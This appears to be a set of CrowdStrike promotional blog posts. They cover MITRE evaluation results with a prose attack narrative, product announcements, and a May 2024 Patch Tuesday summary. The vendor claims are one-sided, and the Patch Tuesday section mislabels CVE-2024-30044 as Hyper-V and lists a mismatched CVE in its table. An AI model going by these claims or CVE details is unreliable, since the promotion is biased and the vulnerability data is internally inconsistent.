Organizations must rigorously evaluate MDR vendors and demand cutting-edge technology, unmatched expertise and proven outcomes. Only a unified approach ensures swift and effective threat detection, investigation and response. This is why the results from MITRE’s latest evaluation should be considered holistically. When reviewing these results, ask yourself: What good is speed if threats are missed? What good are actionable detections if they cannot be trusted or acted on quickly? What good is threat detection if detections happen too slowly to prevent breaches?

Not only did CrowdStrike achieve the highest detection coverage and fastest MTTD of all vendors evaluated, we also generated the highest number of actionable notifications and detections, showcasing our ability to drive superior security outcomes — namely, stopping breaches.

Unsurpassed Speed and Efficacy in MDR

CrowdStrike Falcon Complete MDR achieved remarkable results in the latest MITRE evaluation, building on our previous success in the MITRE Managed Services, Round 1 and the MITRE Enterprise evaluation. We achieved the highest detection coverage of all vendors evaluated.

The CrowdStrike 2024 Global Threat Report shows the average breakout time for eCrime is dropping rapidly, going from 84 minutes in 2022 to just 62 minutes in 2023. The fastest recorded breakout was just over 2 minutes. This real-world data shows every minute counts when sophisticated adversaries attack. With many cybersecurity solutions, by the time a SOC is aware of an intrusion, it’s too late — the adversary will have already moved on to their objective. Falcon Complete detects the attack immediately, preventing a breach.

Organizations must have confidence in their MDR provider’s ability to swiftly detect and eliminate threats with uncompromising efficiency. This closed-book evaluation, in which no vendor had advance notice of the adversary or their TTPs, accurately simulated a real-world attack and offered a precise assessment of each vendor’s ability to detect and report threats, registering MTTD as a critical metric. Vendor response and remediation were not evaluated.

The Falcon Complete team rapidly correlated intelligence and cross-domain data using the Falcon platform’s rich security telemetry, which encompasses endpoint, identity, cloud workloads, third-party data and integrated threat intelligence. CrowdStrike achieved these objectives with astounding speed and accuracy.

Identifying Sophisticated Tradecraft in MITRE Engenuity ATT&CK Evaluations: Managed Services, Round 2

CrowdStrike’s objectives in the evaluation were to investigate and provide context and analysis of Falcon platform detections in order to establish who the threat actor was, identify the earliest and most recent threat actor activity and determine how they gained access to the systems. We were required to present MITRE evidence, if any, that the threat actor accessed or exfiltrated data and identify potential lateral movement to other systems in the environment.

During the evaluation, we reviewed and monitored Falcon platform detections and relevant telemetry across native endpoint and identity data, and network and email third-party telemetry from CrowdStrike Falcon® Next-Gen SIEM, to perform remote triage analysis on impacted systems.

CrowdStrike identified that the MITRE ATT&CK Evaluations for Managed Services emulated the behavior of two sophisticated adversaries tracked as STONE PANDA and ALPHA SPIDER by CrowdStrike Counter Adversary Operations (known as menuPass and ALPHV BlackCat by MITRE).

Learning How the Threat Actor Gained Access

The threat actor was first detected via a remote desktop connection from an unmanaged system, indicating that valid credentials were likely already compromised and used to initiate the attack. Specifically, the credentials for the “kizumi” account were utilized. Using the CrowdStrike Falcon® Identity Threat Protection module, Falcon Complete quickly identified that there were known risks with the account, including shared passwords with another account and a path to a privileged user.

Identifying Threat Actor Activity

Once the threat actor had access to the environment, native tooling using certutil.exe was executed to download malicious binaries from threat actor-controlled infrastructure. These binaries were subsequently sideloaded into the legitimate application Notepad++ and identified to match Sigloader and QuasarRAT malware, confirming the STONE PANDA attribution.

In a real-world scenario, Falcon Complete would have stepped in to contain the host and block authentication for the account using the Falcon Identity Threat Protection module. The customer would have then received a remediation notice via email or Message Center, informing them of the steps taken by Falcon Complete to eradicate the threat.

Identifying Potential Lateral Movement

Once command-and-control (C2) connectivity had been established, CrowdStrike observed the threat actor use QuasarRAT malware to conduct keylogging activity, allowing them to attain credentials for the domain administrator account. Falcon Complete quickly obtained a process memory dump of the Notepad++ process utilizing Falcon Real Time Response to validate that the credentials for kizumi.da had been captured by the keylogger and stored locally on the system under the file path C:\Users\kizumi\AppData\Roaming\Logs\2024-03-25-log. Consequently, this keylogger file was observed being exfiltrated back to the threat actor’s C2 infrastructure.

The threat actor then used their valid credentials with domain administrator privileges, conducting additional network reconnaissance to identify high-value targets — including a Domain Controller, which was targeted for further credential theft. In addition, the threat actor abused the Server Message Block (SMB) protocol to transfer files throughout the environment.

Later, the threat actor used tooling matching indicators consistent with ExMatter to search for and gather potentially sensitive information such as Microsoft Office documents and image files from multiple systems. This allowed Falcon Complete to conclude a second adversary, ALPHA SPIDER/BlackCat, was involved. The data was then exfiltrated via SFTP to threat actor-controlled infrastructure.

 

As the threat actor’s final act, a ransomware binary was downloaded and executed remotely across all victim systems via a renamed copy of PsExec.exe. This destructive act encrypted files, terminated critical processes and performed actions that would inhibit system recovery.

It should be noted that had this not been a controlled simulation, at any point from the first detection onward Falcon Complete would have enacted countermeasures such as network containment, artifact remediation via Falcon Real Time Response, or the blocking of affected accounts via Falcon Identity Threat Protection in order to stop the breach — all while maintaining close communications with the customer. Our comprehensive response capabilities set Falcon Complete apart from any other managed service.

We Dominated the Evaluation — and CrowdStrike Offers Even More

While these test results are fantastic for CrowdStrike and our customers, they don’t come close to telling the full story of the power of the Falcon platform and CrowdStrike services.

Falcon Complete delivers full-cycle remediation: The “R” in “MDR” was notably absent in this evaluation, which focused solely on detecting and reporting adversary activity and did not extend to response or remediation. Most MDR services stop at identifying and investigating threats, leaving the response to the customer with “guided recommendations.” Falcon Complete goes beyond this by performing surgical remediation for endpoints, identities and cloud workloads, containing hosts, removing malicious artifacts and restoring systems to their normal state.

Falcon Adversary OverWatch unearths unknown, advanced attacks: MITRE didn’t specifically evaluate Falcon Adversary OverWatch, but Falcon Adversary OverWatch threat hunters were involved in the active evaluation and were crucial in identifying and reporting steps to MITRE. As adversaries evolve their tradecraft to evade automated detections, Falcon Adversary OverWatch quickly adapts and adjusts to make sense of early signals and complex attack patterns to uncover previously unknown threats.

Falcon Next-Gen SIEM: CrowdStrike Falcon Next-Gen SIEM integrates key data and threat intelligence, including third-party data, into a single console so analysts can see the full scope of any attack with instant correlation of Falcon and third-party sources. With CrowdStrike’s industry-leading threat intelligence and investigation, Falcon Next-Gen SIEM simplifies and accelerates investigations.

Falcon Prevent was disabled: Prevention capabilities of the Falcon agent were not permitted. This highlights the skill of the Falcon Complete team, which was still able to achieve the highest detection coverage and provide recommendations to MITRE in record time. In a real-world scenario, CrowdStrike’s experts, combined with the full capabilities of the Falcon platform, would have disrupted all of the attack attempts before attackers could achieve their objectives, and most of the activity would have been stopped at first contact.

CrowdStrike strongly values participation in independent testing and evaluation. Exercises like the MITRE Engenuity ATT&CK® Evaluations: Managed Services evaluation give customers invaluable, unbiased insight into the performance of cybersecurity solutions. They provide insights into critical features and capabilities and how these will affect the outcome when protecting against real-world adversaries. Participating in these tests also drives innovation, helping CrowdStrike to develop new features that support our mission of stopping breaches.

Additional Resources

• Read the press release.
• See the full results of the MITRE ATT&CK evaluation.
• To register for the CrowdStrike CrowdCast on the MITRE ATT&CK® Evaluation: Managed Services, visit here.
• Learn about another recent MITRE evaluation of the CrowdStrike Falcon platform in this blog: CrowdStrike Achieved 100% Protection, 100% Visibility, 100% Analytic Detection in MITRE Engenuity ATT&CK® Evaluations: Enterprise.
• Read about how CrowdStrike Performed in MITRE ATT&CK Evaluations for Managed Services, Round 1.

CrowdStrike is excited to bring new capabilities to platform engineering and operations teams that manage hybrid cloud infrastructure, including on Red Hat Enterprise Linux and Red Hat OpenShift.

Most organizations operate on hybrid cloud¹, deployed to both private data centers and public clouds. In these environments, manageability and security can become challenging as the technology stack diverges among various service providers. While using “the right tool for the job” can accelerate delivery for IT and DevOps teams, security operations teams often lack the visibility needed to protect all aspects of the environment. CrowdStrike Falcon® Cloud Security combines single-agent and agentless approaches to comprehensively secure modern applications whether they are deployed in the public cloud, on-premises or at the edge.

In response to the growing need for IT and security operations teams to protect hybrid environments, CrowdStrike was thrilled to be a sponsor of this year’s Red Hat Summit — the premier enterprise open source event for IT professionals to learn, collaborate and innovate on technologies from the data center and public cloud to the edge and beyond.

Securing the Linux core of hybrid cloud

While both traditional and cloud-native applications are often deployed to the Linux operating system, specific Linux distributions, versions and configurations pose a challenge to operations and security teams alike. In a hybrid cloud environment, organizations require visibility into all Linux instances, whether they are deployed on-premises or in the cloud. But for many, this in-depth visibility can be difficult to achieve.

Now, administrators using Red Hat Insights to manage their Red Hat Enterprise Linux fleet across clouds can now more easily determine if any of their Falcon sensors are running in Reduced Functionality Mode. CrowdStrike has worked with Red Hat to build custom recommendations for the Red Hat Insights Advisor service, helping surface important security configuration issues directly to IT operations teams. These recommendations are available in the Red Hat Hybrid Cloud Console and require no additional configuration.

 

Security and operations teams must also coordinate on the configuration and risk posture of Linux instances. To assist, CrowdStrike Falcon® Exposure Management identifies vulnerabilities and remediation steps across Linux distributions so administrators can reduce risk. Exposure Management is now extending Center for Internet Security (CIS) hardening checks to Linux, beginning with Red Hat Enterprise Linux. The Falcon platform’s single-agent architecture allows these cyber hygiene capabilities to be enabled with no additional agents to install and minimal system impact.

Even with secure baseline configurations, ad-hoc questions about the state of the fleet can often arise. CrowdStrike Falcon® for IT allows operations teams to ask granular questions about the status and configuration of their endpoints. Built on top of the osquery framework already popular with IT teams, and with seamless execution through the existing Falcon sensor, Falcon for IT helps security and operations consolidate more capabilities onto the Falcon platform and reduce the number of agents deployed to each endpoint.

Operationalizing Kubernetes security

While undeniably popular with DevOps teams, Kubernetes can be a daunting environment to protect for security teams unfamiliar with it. To make the first step easier for organizations using Red Hat and AWS’ jointly managed Red Hat OpenShift Service on AWS (ROSA), CrowdStrike and AWS have collaborated to develop prescriptive guidance for deploying the Falcon sensor to ROSA clusters. The guide documents installation and configuration of the Falcon operator on ROSA clusters, as well as best practices for scaling to large environments. This guidance now has limited availability. Contact your AWS or CrowdStrike account teams to review the guidance.

 

Furthermore, CrowdStrike’s certification of its Falcon operator for Red Hat OpenShift has achieved “Level 2 — Auto Upgrade” status. This capability simplifies upgrades between minor versions of the operator, which improves manageability for platform engineering teams that may manage many OpenShift clusters across multiple cloud providers and on-premises. These teams can then use OpenShift GitOps to manage the sensor version in a Kubernetes-native way, consistent with other DevOps applications and infrastructure deployed to OpenShift.

One of the components deployed by the Falcon operator is a Kubernetes admission controller, which security administrators can use to enforce Kubernetes policies. In addition to checking pod configurations for risky settings, the Falcon admission controller can now block the deployment of container images that violate image policies, including restrictions on a specific base image, package name or vulnerability score. The Falcon admission controller’s deploy-time enforcement complements the build-time image assessment that Falcon Cloud Security already supported.

A strong and secure foundation for hybrid cloud

Whether you are managing 10 or 10,000 applications and services, the Falcon platform protects traditional and cloud-native workloads on-premises, in the cloud, at the edge and everywhere in between — with one agent and one console. Click here to learn more about how the Falcon platform can help protect Red Hat environments.

1. https://www.redhat.com/en/global-tech-trends-2024

Additional Resources

• Learn more about the world’s leading AI-native platform for complete cloud security.
• Learn how the powerful CrowdStrike Falcon® platform provides comprehensive protection across your organization, workers and data, wherever they are located.
• See for yourself how the industry-leading CrowdStrike Falcon platform protects against modern threats. Start your 15-day free trial today.

Time is of the essence when it comes to protecting your data, and often, teams are sifting through hundreds or thousands of alerts to try to pinpoint truly malicious user behavior. Manual triage and response takes up valuable resources, so machine learning can help busy teams prioritize what to tackle first and determine what warrants further investigation.

The new Detections capability in CrowdStrike Falcon® Data Protection reduces friction for teams working to protect their organizational data, from company secrets and intellectual property to sensitive personally identifiable information (PII) or payment card industry (PCI) data. These detections are designed to revolutionize the way organizations detect and mitigate data exfiltration risks, discover unknown threats and prioritize them based on advanced machine learning models.

Key benefits of Falcon Data Protection Detections include:

• Machine learning-based anomaly detections: Automatically identify previously unrecognized patterns and behavioral anomalies associated with data exfiltration.
• Integration with third-party applications via CrowdStrike Falcon® Fusion SOAR workflows and automation: Integrate with existing security infrastructure and third-party applications to enhance automation and collaboration, streamlining security operations.
• Rule-based detections: Define custom detection rules to identify data exfiltration patterns and behaviors.
• Risk prioritization: Automatically prioritize risks by severity, according to the confidence in the anomalous behavior, enabling organizations to focus their resources on mitigating the most critical threats first.
• Investigative capabilities: Gain deeper insights into potential threats and take proactive measures to prevent breaches with tools to investigate and correlate data exfiltration activities.

Potential Tactics for Data Exfiltration

The threat of data exfiltration looms over organizations of all sizes. With the introduction of Falcon Data Protection Detections, organizations now have a powerful tool to effectively identify and mitigate data exfiltration risks. Below, we delve into examples of how Falcon Data Protection Detections can identify data exfiltration via USB drives and web uploads, highlighting the ability to surface threats and prioritize them for mitigation.

For example, a disgruntled employee may connect a USB drive to transfer large volumes of sensitive data. Falcon Data Protection’s ML-based detections will identify when the number of files or file types moved deviates from that of a user’s or peer group’s typical behavior and will raise an alert, enabling security teams to investigate and mitigate the threat.

In another scenario, a malicious insider may attempt to exfiltrate an unusual file type containing sensitive data by uploading it to a cloud storage service or file-sharing platform. By monitoring web upload activities and correlating them against a user’s typical file types egressed, Falcon Data Protection Detections can identify suspicious behavior indicative of unauthorized data exfiltration — even if traditional rules would have missed these events.

In both examples, Falcon Data Protection Detections demonstrates its ability to surface risks associated with data exfiltration and provide security teams with the insights they need to take swift and decisive action. By using advanced machine learning models and integrating seamlessly with the rest of the CrowdStrike Falcon® platform, Falcon Data Protection Detections empowers organizations to stay one step ahead of cyber threats and protect their most valuable asset — their data.

Anomaly Detections: Using Behavioral Analytics for Comprehensive Protection

In the ever-evolving landscape of cybersecurity threats, organizations must continually innovate their detection methodologies to stay ahead of adversaries. Our approach leverages user behavioral analytics at three distinct levels — User Level, Peer Level and Company Level — to provide organizations with comprehensive protection and increase the accuracy of detections.

User Level: Benchmarks for Contextual History

At the User Level, behavioral analytics are employed to understand and contextualize each individual user’s benchmark activity against their own personal history. By analyzing factors such as file activity, access patterns and destination usage, organizations can establish a baseline of normal behavior for each user.

Using machine learning algorithms, anomalies that deviate from this baseline are flagged as potential indicators of data exfiltration attempts.

Peer Level: Analyzing User Cohorts with Similar Behavior

Behavioral analytics can also be applied at the Peer Level to identify cohorts of users who exhibit similar behavior patterns, regardless of their specific work functions. This approach involves clustering users based on their behavioral attributes and analyzing their collective activities. By extrapolating and analyzing user cohorts, organizations can uncover anomalies that may not be apparent at the User Level.

For example, if an employee and their peers typically only handle office documents, but one day the employee begins to upload source code files to the web, a detection will be created even if the volume of activity is low, because it is so atypical for this peer group. This approach surfaces high-impact events that might otherwise be missed by manual triage or rules based on static attributes.

Company Level: Tailoring Anomalies to Expected Activity

At the Company Level, user behavioral analytics are magnified to account for the nuances of each organization’s business processes and to tailor anomalies to their expected activity. This involves incorporating domain-specific knowledge and contextual understanding of the organization’s workflows and operations based on file movements and general data movement.

By aligning detection algorithms with the organization’s unique business processes, security teams can more accurately identify deviations from expected activity and prioritize them based on their relevance to the organization’s security posture. For example, anomalies that deviate from standard workflows or access patterns can be flagged for further investigation, while routine activities are filtered out to minimize noise. Additionally, behavioral analytics at the Company Level enable organizations to adapt to changes in their environment such as organizational restructuring, new business initiatives or shifts in employee behavior. This agility ensures detection capabilities remain relevant and effective over time.

 

The Details panel includes the detection’s number of files and data volume moved versus the established baselines per user, peers and the organization. This panel also contains contextual factors such as first-time use of a USB device or web destination, and metadata associated with the file activity, to better understand the legitimate reasons behind certain user behaviors. This nuanced approach provides a greater level of confidence that a detection indicates a true positive for data exfiltration.

Rule-based Detections: Enhancing the Power of Classifications and Rules

In addition to the aforementioned anomaly detections, you can configure rule-based detections associated with your data classifications. This enhances the power of data classification to assign severity, manage triage and investigation, and trigger automated workflows. Pairing these with anomaly detections gives your team more clarity into what to pursue first and lets you establish blocking policies for actions that should not occur.

 

Traditional approaches to data exfiltration detection often rely on manual monitoring, which is labor-intensive and time-consuming, and strict behavior definitions, which lack important context and are inherently limited in their effectiveness. These methods struggle to keep pace with the rapidly evolving threat landscape, making it challenging for organizations to detect and mitigate data exfiltration in real time. As a result, many organizations are left vulnerable to breaches. By pairing manual data classification with the detections framework, organizations’ institutional knowledge is enhanced by the power of the Falcon platform.

 

Combining the manual approach with the assistance of advanced machine learning models and automation brings the best of both worlds, paired with the institutional knowledge and subject matter expertise of your team.

Stop Data Theft: Automate Detection and Response with Falcon Fusion Workflows

When you integrate with Falcon Fusion SOAR, you can create workflows to precisely define the automated actions you want to perform in response to Falcon Data Protection Detections. For example, you can create a workflow that automatically generates a ServiceNow incident ticket or sends a Slack message when a high-severity data exfiltration attempt is detected.

Falcon Data Protection Detections uses advanced machine learning algorithms and behavioral analytics to identify anomalous patterns indicative of data exfiltration. By continuously monitoring user behavior and endpoint activities, Falcon Data Protection can detect and mitigate threats in real time, reducing the risk of data breaches and minimizing the impact on organizations’ operations. Automation enables organizations to scale their response capabilities efficiently, allowing them to adapt to evolving threats and protect their sensitive assets. With automated investigation and response, security teams can shift their efforts away from sifting through vast amounts of data manually to investigating and mitigating high-priority threats.

Additional Resources

• Register for the Unstoppable Innovations CrowdCast.
• Download the white paper on stopping GenAI data leaks.
• Already a CrowdStrike customer? Try Falcon Data Protection today.

Microsoft has released security updates for 61 vulnerabilities in its May 2024 Patch Tuesday rollout. There are two zero-day vulnerabilities patched, affecting Windows MSHTML (CVE-2024-30040) and Desktop Window Manager (DWM) Core Library (CVE-2024-30051), and one Critical vulnerability patched affecting Microsoft SharePoint Server (CVE-2024-30044).

May 2024 Risk Analysis

This month’s leading risk type is remote code execution (44%) followed by elevation of privilege (28%) and information disclosure (11%). This follows the trend set last month.

 

Windows products received the most patches this month with 47, followed by Extended Security Update (ESU) with 25 and Developer Tools with 4.

Zero-Day Affecting Windows MSHTML Platform

CVE-2024-30040 is a security feature bypass vulnerability affecting the Microsoft Windows MSHTML platform with a severity rating of Important and a CVSS score of 8.8. Successful exploitation of this vulnerability would allow the attacker to circumvent the mitigation previously added to protect against an Object Linking and Embedding attack, and download a malicious payload to an unsuspecting host.

That malicious payload can lead to malicious embedded content and a victim user potentially clicking on that content, resulting in undesirable consequences. The MSHTML platform is used throughout Microsoft 365 and Microsoft Office products. Due to the exploitation status of this vulnerability, patching should be done immediately to prevent exploitation.

Severity	CVSS Score	CVE	Description
Important	8.8	CVE-2024-30040	Windows MSHTML Platform Security Feature Bypass Vulnerability

Table 1. Critical vulnerabilities in Windows MSHTML Platform

Zero-day Affecting Desktop Window Manager Core Library

CVE-2024-30051 is an elevation of privilege vulnerability affecting Microsoft Windows Desktop Window Manager (DWM) Core Library with a severity rating of Important and a CVSS score of 7.8. This library is responsible for interacting with applications in order to display content to the user. Successful exploitation of this vulnerability would allow the attacker to gain SYSTEM-level permissions.

CrowdStrike has detected active exploitation attempts of this vulnerability. Due to this exploitation status, patching should be done immediately to prevent exploitation.

Severity	CVSS Score	CVE	Description
Important	7.8	CVE-2024-30051	Windows DWM Core Library Elevation of Privilege Vulnerability

Table 2. Critical vulnerabilities in Windows Desktop Window Manager Core Library 

Critical Vulnerability Affecting Microsoft SharePoint Server

CVE-2024-30044 is a Critical remote code execution (RCE) vulnerability affecting Microsoft Windows Hyper-V with a CVSS score of 8.1. Successful exploitation of this vulnerability would allow an authenticated attacker with Site Owner privileges to inject and execute arbitrary code on the SharePoint Server.

Severity	CVSS Score	CVE	Description
Critical	8.1	CVE-2024-21407	Microsoft SharePoint Server Remote Code Execution Vulnerability

Table 3. Critical vulnerabilities in Microsoft SharePoint Server 

Not All Relevant Vulnerabilities Have Patches: Consider Mitigation Strategies

As we have learned with other notable vulnerabilities, such as Log4j, not every highly exploitable vulnerability can be easily patched. As is the case for the ProxyNotShell vulnerabilities, it’s critically important to develop a response plan for how to defend your environments when no patching protocol exists.

Regular review of your patching strategy should still be a part of your program, but you should also look more holistically at your organization’s methods for cybersecurity and improve your overall security posture.

The CrowdStrike Falcon® platform regularly collects and analyzes trillions of endpoint events every day from millions of sensors deployed across 176 countries. Watch this demo to see the Falcon platform in action.

Learn More

Learn more about how CrowdStrike Falcon® Exposure Management can help you quickly and easily discover and prioritize vulnerabilities and other types of exposures here.

About CVSS Scores

The Common Vulnerability Scoring System (CVSS) is a free and open industry standard that CrowdStrike and many other cybersecurity organizations use to assess and communicate software vulnerabilities’ severity and characteristics. The CVSS Base Score ranges from 0.0 to 10.0, and the National Vulnerability Database (NVD) adds a severity rating for CVSS scores. Learn more about vulnerability scoring in this article.

Additional Resources

• For more information on which products are in Microsoft’s Extended Security Updates program, refer to the vendor guidance here.
• Read the CrowdStrike 2024 Global Threat Report to learn how the threat landscape has shifted in the past year and understand the adversary behavior driving these shifts.
• See how Falcon Exposure Management can help you discover and manage vulnerabilities and other exposures in your environments.
• Learn how CrowdStrike’s external attack surface module, CrowdStrike® Falcon Surface, can discover unknown, exposed and vulnerable internet-facing assets, enabling security teams to stop adversaries in their tracks.
• Learn how CrowdStrike Falcon® Identity Protection products can stop workforce identity threats faster.
• Make prioritization painless and efficient. Watch how CrowdStrike Falcon® Spotlight enables IT staff to improve visibility with custom filters and team dashboards.
• Test CrowdStrike next-gen antivirus for yourself with a free trial of CrowdStrike® Falcon Prevent.

Your business is in a race against modern adversaries — and legacy approaches to security simply do not work in blocking their evolving attacks. Fragmented point products are too slow and complex to deliver the threat detection and prevention capabilities required to stop today’s adversaries — whose breakout time is now measured in minutes — with precision and speed.

As technologies change, threat actors are constantly refining their techniques to exploit them. CrowdStrike is committed to driving innovation for our customers, with a relentless focus on building and delivering advanced technologies to help organizations defend against faster and more sophisticated threats.

CrowdStrike is collaborating with NVIDIA in this mission to accelerate the use of state-of-the-art analytics and AI in cybersecurity to help security teams combat modern cyberattacks, including AI-powered threats. The combined power of the AI-native CrowdStrike Falcon® XDR platform and NVIDIA’s cutting-edge computing and generative AI software, including NVIDIA NIM, delivers the future of cybersecurity with community-wide, AI-assisted protection with the organizational speed and automation required to stop breaches.

“Cybersecurity is a data problem; and AI is a data solution,” said Bartley Richardson, NVIDIA’s Director of Cybersecurity Engineering and AI Infrastructure. “Together, NVIDIA and CrowdStrike are helping enterprises deliver security for the generative AI era.”

AI: The Great Equalizer

Advancements in generative AI present a double-edged sword in the realm of cybersecurity. AI-powered technologies create an opportunity for adversaries to develop and streamline their attacks, and become faster and stealthier in doing so.

Having said that, AI is the great equalizer for security teams. This collaboration between AI leaders empowers organizations to stay one step ahead of adversaries with advanced threat detection and response capabilities. By coupling the power of CrowdStrike’s petabyte-scale security data with NVIDIA’s accelerated computing infrastructure and software, including new NVIDIA NIM inference microservices, organizations are empowered with custom and secure generative AI model creation to protect today’s businesses.

Driving Security with AI: Combating the Data Problem

CrowdStrike creates the richest and highest fidelity security telemetry, on the order of petabytes daily, from the AI-native Falcon platform. Embedded in the Falcon platform is a virtuous data cycle where cybersecurity’s very best threat intelligence data is collected at the source, preventative and generative models are built and trained, and CrowdStrike customers are protected with community immunity. This collaboration helps Falcon users take advantage of AI-powered solutions to stop the breach, faster than ever.

 

Joint customers can meet and exceed necessary security requirements — all while increasing their adoption of AI technologies for business acceleration and value creation. With our integration, CrowdStrike can leverage NVIDIA accelerated computing, including the NVIDIA Morpheus cybersecurity AI framework and NVIDIA NIM, to bring custom LLM-powered applications to the enterprise for advanced threat detection. These AI-powered applications can process petabytes of logs to help meet customer needs such as:

• Improving threat hunting: Quickly and accurately detect anomalous behavior indicating potential threats, and search petabytes of logs within the Falcon platform to find and defend against threats.
• Identifying supply chain attacks: Detect supply chain attack patterns with AI models using high-fidelity security telemetry across cloud, identities and endpoints.
• Protecting against vulnerabilities: Identify high-risk CVEs in seconds to determine whether a software package includes vulnerable or exploitable components.

The Road Ahead

The development work undertaken by both CrowdStrike and NVIDIA underscores the importance of advancing AI technology and its adoption within cybersecurity. With our strategic collaboration, customers benefit from having the best underlying security data to operationalize their selection of AI architectures with confidence to prevent threats and stop breaches.

At NVIDIA’s GTC conference this year, we highlighted the bright future ahead for security professionals using the combined power of Falcon data with NVIDIA’s advanced GPU-optimized AI pipelines and software. This enables customers to turn their enterprise data into powerful insights and actions to solve business-specific use cases with confidence.

By continuing to pioneer innovative approaches and delivering cutting-edge cybersecurity solutions for the future, we forge a path toward a safer world, ensuring our customers remain secure in the face of evolving cyber threats.

Additional Resources

• Read the press release.
• Read the Nvidia blog on NVIDIA NIM and Morpheus.
• Read the CrowdStrike blog on the use of AI in cybersecurity.
• Get a full-featured free trial of CrowdStrike Falcon® Prevent and see how true next-gen AV performs against today’s most sophisticated threats.

The massive increase in cloud adoption has driven adversaries to focus their efforts on cloud environments — a shift that led to cloud intrusions increasing by 75% in 2023, emphasizing the need for stronger cloud security.

Larger scale leads to larger risk. As organizations increase their quantity of cloud assets, their attack surface grows. Each asset brings its own set of security concerns. Large cloud environments are prone to more cloud misconfigurations, which provide more opportunities for adversaries to breach the perimeter. Furthermore, when breaches do occur, tracing lateral movement to stop malicious activity is challenging in a complex cloud environment.

CrowdStrike, a proven cloud security leader, has enhanced its CrowdStrike Falcon® Cloud Security capabilities to ensure security analysts can easily visualize their cloud assets’ connections so they can better understand and prioritize risks. Today we’re expanding our asset graph to help modern organizations secure everything they build in the cloud.

Stop Adversaries with Attack Path Analysis

We continue to expand our attack path analysis capabilities. Today, we’re announcing support for key AWS services including EC2, S3, IAM, RDS and container images.

With this enhanced support, CrowdStrike customers can quickly understand where their cloud weaknesses would allow adversaries to:

• Gain initial access to their AWS environment
• Move laterally to access vital compute resources
• Extract data from storage buckets

Investigating cyberattacks can be a grueling, stressful task. The CrowdStrike Falcon® platform stops breaches and empowers security analysts to find the root cause of each attack. As Falcon’s attack path analysis extends further into the cloud, customers can leverage CrowdStrike® Asset Graph to more quickly investigate attacks and proactively resolve cloud weaknesses.

 

In this example, we are investigating an EC2 instance with a vulnerable metadata version enabled. We see the EC2 instance is open to global traffic, so we select “Asset Graph” to investigate.

In Asset Graph, an adversary’s potential entry point is automatically flagged for us. The access control list is misconfigured and accepts traffic from every IP address. Upon inspection, we quickly visualize how the adversary would move laterally to access our EC2 instance. To resolve this issue, we first restrict the access control list to company-specific IP addresses. Then, we update the metadata service version used by the EC2 instance.

 

Both indicators of attack (IOAs) and indicators of misconfiguration (IOMs) are available for each managed cloud asset. With this knowledge, security teams can quickly identify each asset that allows for initial access to their cloud. Furthermore, sensitive compute and storage assets are automatically traced to upstream security groups and network access lists that allow for initial access. Using Falcon’s attack path analysis, security teams quickly see the remediation steps required to protect their cloud from adversaries.

Investigate Findings with Query Builder

Speed and agility are massive cloud benefits. However, the ability to quickly spin up cloud resources can result in asset sprawl — an unexpectedly large number of cloud assets in a live environment. For example, in some environments, a single S3 bucket can be accessible to many IAM roles. Each of those IAM roles may contain access to a large quantity of other storage buckets. Security teams need a way to sift through massive cloud estates to find the services requiring attention.

 

The Falcon query builder capabilities allow security teams to ask questions like:

• Which EC2 instances are internet-facing and contain critical security risks?
• Have any IOAs appeared on my AWS assets in the last seven days?

 

With Falcon’s query builder, pinpointing cloud weaknesses becomes an efficient process. Graphical views of cloud assets can be daunting. Building queries with Falcon enables teams to focus their attention on the assets that matter most: those that are prone to exploitation by adversaries.

Delivered from the Unified CrowdStrike Falcon Platform

The expansion of cloud asset visualization is another step toward providing a single console that addresses every cloud security concern. By integrating IOAs and IOMs with a connected asset map, CrowdStrike offers a robust, efficient solution for investigating today’s cloud security challenges. 

Unlike other vendors that may offer disjointed security components, CrowdStrike’s approach integrates elements across the entire cloud infrastructure. From hybrid to multi-cloud environments, everything is managed through a single, intuitive console within the AI-native CrowdStrike Falcon platform. This unified cloud-native application protection platform (CNAPP) ensures organizations achieve the highest standards of security, effectively shielding against breaches with an industry-leading cloud security solution. The cloud asset visualization, while pivotal, is just one component of this comprehensive CNAPP approach, underscoring CrowdStrike’s commitment to delivering unparalleled security solutions that meet and anticipate the adversaries’ attacks on cloud environments.

Get a free Cloud Security Health Check and see Falcon Cloud Security in action for yourself.  

During the review, you will engage in a one-on-one session with a cloud security expert, evaluate your current cloud environment, and identify misconfigurations, vulnerabilities and potential cloud threats. 

Additional Resources

• See why Forrester named CrowdStrike a Leader in The Forrester Wave: Cloud Workload Security, Q1 2024. 
• Learn more about CrowdStrike’s approach to continuous discovery and visibility of cloud-native assets with Cloud Security Posture Management.
• Learn about ​​common cloud misconfigurations and find out how to minimize the adversaries’ opportunities to exploit them in this eBook: Seven Easily Exploited Cloud Misconfigurations.
• Check out Falcon Cloud Security’s Attack Path Analysis capability in action via a Demo Drill Down.

Today’s businesses are building their future in the cloud. They rely on cloud infrastructure and services to operate, develop new products and deliver greater value to their customers. The cloud is the catalyst for digital transformation among organizations of all sizes and industries.

But while the cloud powers immeasurable speed, growth and innovation, it also presents risk. The adoption of cloud technologies and modern software development practices have driven an explosion in the number of services, applications and APIs organizations rely on. For many, the attack surface is larger than ever — and rapidly expanding.

Adversaries are taking advantage of the shift. Last year, CrowdStrike observed a 75% increase in cloud intrusions and a 110% spike in cloud-conscious incidents, indicating threat actors are increasingly adept at breaching and navigating cloud environments. Cloud is the new battleground for modern cyber threats, but most organizations are not prepared to fight on it.

It’s time for a pivotal change in how organizations secure their cloud environments. CrowdStrike’s vision is to simplify and scale cloud security through a single, unified platform so security teams can protect the business with the same agility as their engineering colleagues. Our leadership in cloud security demonstrates our results so far: Most recently, we were recognized as a leader in The Forrester Wave: Cloud Workload Security, Q1 2024 and a global leader in Frost & Sullivan’s Frost Radar: Cloud-Native Application Protection Platforms, 2023.

Today, our commitment to cloud security innovation continues. I’m thrilled to announce the general availability of CrowdStrike Falcon Application Security Posture Management (ASPM) and the expansion of our cloud detection and response (CDR) capabilities. Let’s dive into the details.

CrowdStrike CNAPP Extends Cloud Security to Applications

With the integration of ASPM into Falcon Cloud Security, CrowdStrike brings together the most critical CNAPP capabilities in a single, cloud-native platform, delivering the deep visibility, DevOps workflow integrations and incident response capabilities teams need to secure their cloud infrastructure and applications.

The demand for strong application security has never been greater: 71% of organizations report releasing application updates at least once a week, 23% push updates multiple times per week and 19% push updates multiple times per day. Only 54% of major code changes undergo a full security review before they’re deployed to production. And 90% of security teams use 3+ tools to detect and prioritize application vulnerabilities, making prioritization a top challenge for most.

CrowdStrike now delivers a unified CNAPP platform that sets a new standard for modern cloud security with:

• Business Threat Context: DevSecOps teams can quickly understand and prioritize high-risk threats and vulnerabilities affecting sensitive data and the mission-critical applications organizations rely on most.
